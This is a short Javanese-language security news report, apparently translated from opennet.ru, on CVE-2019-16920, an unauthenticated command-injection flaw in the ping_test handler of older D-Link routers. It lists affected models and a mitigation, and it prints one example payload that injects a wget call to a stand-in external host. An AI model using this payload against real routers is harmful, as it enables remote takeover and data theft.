Kerentanan sing bisa dieksploitasi kanthi jarak jauh ing router D-Link

Ing router nirkabel D-Link dikenali kerentanan mbebayani (CVE-2019–16920), sing ngidini sampeyan nglakokake kode saka jarak jauh ing sisih piranti kanthi ngirim panjaluk khusus menyang pawang "ping_test", bisa diakses tanpa otentikasi.

Apike, miturut pangembang perangkat kukuh, telpon "ping_test" kudu dieksekusi mung sawise otentikasi, nanging ing kasunyatan kasebut diarani apa wae, preduli saka mlebu menyang antarmuka web. Utamane, nalika ngakses skrip apply_sec.cgi lan ngliwati parameter "action = ping_test", skrip kasebut dialihake menyang kaca otentikasi, nanging ing wektu sing padha nindakake tumindak sing ana gandhengane karo ping_test. Kanggo nglakokake kode kasebut, kerentanan liyane digunakake ing ping_test dhewe, sing nelpon sarana ping tanpa mriksa kanthi bener alamat IP sing dikirim kanggo dites. Contone, kanggo nelpon utilitas wget lan nransfer asil printah "echo 1234" menyang host eksternal, mung nemtokake parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http: // test.test/?$( echo 1234)".

Kerentanan sing bisa dieksploitasi kanthi jarak jauh ing router D-Link

Anane kerentanan wis dikonfirmasi kanthi resmi ing model ing ngisor iki:

  • DIR-655 karo perangkat kukuh 3.02b05 utawa lawas;
  • DIR-866L karo perangkat kukuh 1.03b04 utawa lawas;
  • DIR-1565 karo perangkat kukuh 1.01 utawa lawas;
  • DIR-652 (ora ana informasi babagan versi perangkat kukuh sing duwe masalah)

Periode dhukungan kanggo model kasebut wis kadaluwarsa, mula D-Link nyatakake, sing ora bakal ngeculake nganyari kanggo ngilangi kerentanan kasebut, ora nyaranake nggunakake lan menehi saran kanggo ngganti piranti anyar. Minangka solusi keamanan, sampeyan bisa mbatesi akses menyang antarmuka web mung kanggo alamat IP sing dipercaya.

Banjur ditemokake yen kerentanan kasebut uga mengaruhi model DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 lan DIR-825, rencana kanggo ngeculake nganyari sing durung dikenal.

Source: opennet.ru

Add a comment